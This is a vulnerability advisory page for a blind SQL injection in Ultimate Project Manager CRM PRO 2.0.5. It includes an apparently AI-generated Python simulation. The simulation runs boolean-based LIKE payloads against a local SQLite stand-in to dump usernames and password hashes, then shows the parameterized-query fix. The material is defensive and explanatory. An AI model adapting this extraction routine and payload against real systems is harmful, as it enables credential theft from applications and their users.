CVE-2020-37004
Description
Ultimate Project Manager CRM PRO 2.0.5 contains a blind SQL injection vulnerability that allows attackers to extract usernames and password hashes from the tbl_users database table. Attackers can exploit the /frontend/get_article_suggestion/ endpoint by crafting malicious search parameters to progressively guess and retrieve user credentials through boolean-based inference techniques.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Ultimate Project Manager CRM PRO ≤2.0.5 has a blind SQL injection in /frontend/get_article_suggestion/ allowing credential theft.
Vulnerability
Description
The Ultimate Project Manager CRM PRO version 2.0.5 (and possibly earlier) contains a blind SQL injection vulnerability in the /frontend/get_article_suggestion/ endpoint. The search parameter is interpolated into a SQL query without sanitization or parameter binding, so an attacker can inject arbitrary SQL into the query [1][3]. The injection is blind: the response does not echo query results, so UNION-based extraction does not apply, and data must instead be inferred from boolean differences in the response, such as a change in response length between a true and a false injected condition [1].
Exploitation
Details
An unauthenticated attacker can exploit the endpoint by sending POST requests with crafted search parameters. The exploit script disclosed in OffSec's Exploit Database demonstrates character-by-character guessing against the tbl_users table: it first recovers usernames with LIKE prefix patterns on the username column, then uses each discovered username to leak the corresponding password hash [1]. The attack requires only network access to the application and no prior authentication, so it is remotely exploitable with low complexity (CVSS v3 base score 8.2) [3].
Impact
Successful exploitation allows an attacker to extract every username and password hash from the tbl_users table. Hashes recovered this way can be cracked offline and then used to authenticate as any user, including administrators, which can lead to full compromise of the application, exposure of its data, privilege escalation, and further attacks on connected systems [1][3].
Mitigation
The vendor homepage (ultimatepro.codexcube.com) does not indicate a patch for versions ≤2.0.5 [2]. Users should upgrade to a patched version beyond 2.0.5 as soon as one is available; until then, WAF rules or firewall restrictions that block requests carrying SQL injection patterns to the vulnerable endpoint reduce exposure but are only a stopgap, since boolean-based payloads can often be reshaped to evade signature matching. The proper fix is for the endpoint to bind the search value as a query parameter rather than concatenating it into the SQL statement. No workaround from the vendor is documented as of publication date.
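To make the boolean-based inference from the Vulnerability and Exploitation sections concrete, and to show the parameterized query the Mitigation section calls for, the following Python simulation is an added example: it is not code from the product, from the Exploit Database entry, or from this page. An in-memory SQLite database stands in for tbl_users, and a hypothetical `vulnerable_search` function stands in for the /frontend/get_article_suggestion/ endpoint, concatenating the search parameter into a LIKE clause the way the description says the real endpoint does; `safe_search` binds the same value as a parameter. `dump_credentials` then runs the character-by-character LIKE guessing of usernames followed by password hashes against either function. The column and table names other than tbl_users, the article table, the sample users and hashes, and the exact injection payload are all constructed assumptions; the product's actual schema and query are not documented on this page.

```python
import sqlite3
import string

# Constructed sample rows standing in for tbl_users (hashes are MD5 of throwaway
# strings; the product's real hash format is not documented here).
SAMPLE_USERS = [
    ("admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    ("alice", "e99a18c428cb38d5f260853678922e03"),
]


def make_db():
    """Build an in-memory stand-in for the application database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tbl_users (user_id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO tbl_users (username, password) VALUES (?, ?)", SAMPLE_USERS)
    conn.execute("CREATE TABLE tbl_articles (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO tbl_articles (title) VALUES (?)", [("Getting started",), ("Billing FAQ",)])
    return conn


def vulnerable_search(conn, search):
    """Hypothetical stand-in for the vulnerable endpoint: the search value is
    concatenated straight into the LIKE literal."""
    sql = "SELECT title FROM tbl_articles WHERE title LIKE '%" + search + "%'"
    return [row[0] for row in conn.execute(sql)]


def safe_search(conn, search):
    """Hardened form: the search value is bound as a parameter, so it can only
    ever be pattern text, never SQL."""
    sql = "SELECT title FROM tbl_articles WHERE title LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + search + "%",))]


def oracle(endpoint, conn, condition):
    """Boolean oracle. The payload closes the LIKE literal, ANDs in the attacker's
    condition, and re-opens a literal that the endpoint's trailing %' completes.
    A true condition returns the normal article list, a false one returns nothing,
    so the response length is the side channel."""
    payload = "%' AND (" + condition + ") AND '1%'='1"
    return len(endpoint(conn, payload)) > 0


def extract_value(endpoint, conn, subquery, charset, max_len=64):
    """Recover the single string produced by `subquery` one character at a time:
    LIKE 'prefix<c>%' is true exactly when the next character is <c>. LIKE is
    case-insensitive in SQLite (and MySQL by default), so letters come back as
    whatever case the charset uses."""
    value = ""
    while len(value) < max_len:
        for c in charset:
            if oracle(endpoint, conn, f"({subquery}) LIKE '{value + c}%'"):
                value += c
                break
        else:
            return value  # no candidate matched: end of string (or NULL row)
    return value


def dump_credentials(endpoint, conn, max_users=10):
    """Usernames first (ordered, one per OFFSET), then each user's hash."""
    creds = []
    for i in range(max_users):
        user_q = f"SELECT username FROM tbl_users ORDER BY username LIMIT 1 OFFSET {i}"
        username = extract_value(endpoint, conn, user_q, string.ascii_lowercase + string.digits)
        if not username:
            break  # OFFSET past the last row yields NULL, which never matches
        hash_q = f"SELECT password FROM tbl_users WHERE username = '{username}'"
        pw_hash = extract_value(endpoint, conn, hash_q, "0123456789abcdef")
        creds.append((username, pw_hash))
    return creds


if __name__ == "__main__":
    db = make_db()
    print("vulnerable endpoint:", dump_credentials(vulnerable_search, db))
    print("parameterized endpoint:", dump_credentials(safe_search, db))
```

Run against `vulnerable_search` the dump returns both constructed users and their hashes; against `safe_search` the same payloads are treated as literal pattern text, the oracle never fires, and the dump returns an empty list. The point for defenders is the second function: binding the parameter removes the injection regardless of what a WAF in front of it does or does not catch.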
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
Range: = 2.0.5
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
News mentions
No linked articles in our index yet.